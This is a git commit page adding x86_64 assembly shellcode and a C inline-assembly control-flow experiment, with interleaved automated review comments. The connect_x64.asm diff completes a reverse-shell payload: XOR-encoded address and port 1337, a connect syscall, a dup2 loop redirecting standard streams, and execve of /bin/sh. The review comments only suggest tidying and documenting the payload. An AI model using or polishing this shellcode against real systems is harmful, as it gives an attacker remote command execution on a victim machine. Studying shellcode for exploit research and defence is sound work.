author | toni <matzeton@googlemail.com> | 2015-09-23 12:39:54 +0200 |
---|---|---|
committer | toni <matzeton@googlemail.com> | 2015-09-23 12:39:54 +0200 |
commit | ba60e5853f3c655245229c7abf1a8e25922a127a (patch) | |
tree | 57f715f1157a796f40743693131b9055245f93e8 | |
parent | f187f832b297045d85635ddbb1285ba0b83fb403 (diff) |
x86_64 shellcode + funcjmp_ext
-rw-r--r-- | .gitignore | 1 | ||||
-rw-r--r-- | funcjmp_ext.c | 45 | ||||
-rw-r--r-- | shellcode/connect_x64.asm | 50 | ||||
-rw-r--r-- | shellcode/socket_x64.asm | 2 |
4 files changed, 75 insertions, 23 deletions
@@ -7,3 +7,4 @@ overflow_tcp_x64
 sc-test
 sc-test_x64
 funcjmp_simple
+funcjmp_ext
diff --git a/funcjmp_ext.c b/funcjmp_ext.c
new file mode 100644
index 0000000..70f757a
--- /dev/null
+++ b/funcjmp_ext.c
@@ -0,0 +1,45 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+
+#define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \
+ asm volatile(_asm_str); \
+ asm volatile(".att_syntax prefix");
+#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void)
+#define JMP_FUNC_DECL(func) void *fptr = (void *)( &func );
+#define JMP_TO_FUNC \
+ INTEL_ASM(" \
+ call getip; \
+ jmp short donext; \
+ cfunc: \
+ mov eax,[fptr]; \
+ add eax,0x0; \
+ jmp eax; \
+ ret; \
+ getip: \
+ nop; \
+ jmp short cfunc; \
+ donext: \
+ ");
+
+#define PRE_JUMP(arg)
+
+
+int hookable(char *arg0, int arg1, int arg2)
+{
+ asm("label:");
+ INTEL_ASM("nop; nop; nop");
+ asm("jmp end");
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ asm("push %0" : : "m" (hookable));
+ asm("push %0" : : "g" (hookable));
+ asm("jmp label; \
+ end:");
+ //hookable(NULL, 0x8, 0x9);
+ return 66;
+}
+
diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm
index d1e0ef2..829a7fd 100644
--- a/shellcode/connect_x64.asm
+++ b/shellcode/connect_x64.asm
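Review bot: The two `asm("push %0" ...)` statements in main are never popped, so at `return 66` rsp sits 16 bytes below where the prologue left it; a frame-pointer epilogue (`leave`) would likely mask this, but a frameless build returns through stale stack data. Either drop the pushes or balance them after the label, e.g. `asm("jmp label; end: addq $16, %rsp");`. The macros `JMP_TO_FUNC`, `JUMPABLE_FUNC`, `JMP_FUNC_DECL` and `PRE_JUMP` are defined but unused in this file, and `JMP_TO_FUNC` keeps the function pointer in 32-bit `eax` (`mov eax,[fptr]` / `jmp eax`), which truncates a pointer on the x86_64 target named in the commit title. A header comment stating the intended target, that the file depends on -O0-style codegen (the `jmp label` into hookable skips its prologue), and that `label`/`end` are global asm symbols that must stay unique per binary would make the experiment reproducible.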
@@ -17,32 +17,38 @@ mov rdi,rax
 xor rax,rax
 push rax
 push rax
-push 0x1011116E ; XOR-encoded -> 127.0.0.1
-xor dword [rsp],0x11111111
-push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
-xor word [rsp],0x1111 ; decode tcp port
-push word 0x2 ; 0x2 -> AF_INET
-mov rsi,rsp
+push dword 0x1011116E ; XOR-encoded -> 127.0.0.1
+xor dword [rsp],0x11111111
+push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
+xor word [rsp],0x1111 ; decode tcp port
+push word 0x2 ; 0x2 -> AF_INET
+mov rsi,rsp
 mov dl,0x10
 mov al,42
 syscall
 ; dup2()
-;mov rbx,rdi
-;xor rdi,rdi
-;xor rsi,rsi
-;xor rcx,rcx ; zero out count register
-;mov cl,0x3 ; loopcount
-;dupes:
-;xor eax,eax ; zero out eax
-;mov al,33 ; dup2() syscall
-;dec cl
-;mov rdi,rcx
-;mov rsi,rbx
-;syscall
-;inc cl
-;loop dupes
+xor rdx,rdx
+mov dl,0x3
+dupes:
+mov rsi,rdx
+dec rsi
+xor rax,rax
+mov al,0x21
+syscall
+dec dl
+jnz dupes
-; exec()
+; exec
+mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
+push rax
+xor rax,rax
+mov byte [rsp + 8],al
+mov rdi,rsp
+push rax
+mov rsi,rsp
+push rax
+mov rdx,rsp
+mov al,0x3b
+syscall
-; exit()
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm
index 1ec36b0..885c0fd 100644
--- a/shellcode/socket_x64.asm
+++ b/shellcode/socket_x64.asm
@@ -57,7 +57,7 @@ jnz dupes
 mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
 push rax ; push the string onto the stack
 xor rax,rax
-mov byte [rsp + 8],al ; null-terminate the string
+mov byte [rsp + 8],al ; null-terminate the string
 mov rdi,rsp ; arg1 = pointer to string
 push rax ; arg2 = null
 mov rsi,rsp
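Review bot: The added dup2 loop and exec block select syscalls with bare magic numbers (`mov al,42`, `mov al,0x21`, `mov al,0x3b`) and carry no per-line comments, while socket_x64.asm in the same commit documents the identical exec sequence line by line (`; null-terminate the string`, `; arg1 = pointer to string`, `; arg2 = null`); copy those comments over so the two listings stay consistent. Name the numbers once at the top of the file, e.g. `SYS_DUP2 equ 0x21` and `SYS_EXECVE equ 0x3b`, and use them in the `mov al,...` lines, as the hard-coded values are the first thing a reader has to look up. The replaced `;loop dupes` block had a `; loopcount` comment on the counter; the new `mov dl,0x3` / `dec dl` / `jnz dupes` form should state the same invariant, e.g. `; dl = fds left to dup2 (2,1,0)`. The listing begins before this hunk (line 17), so the register setup it depends on is not visible here.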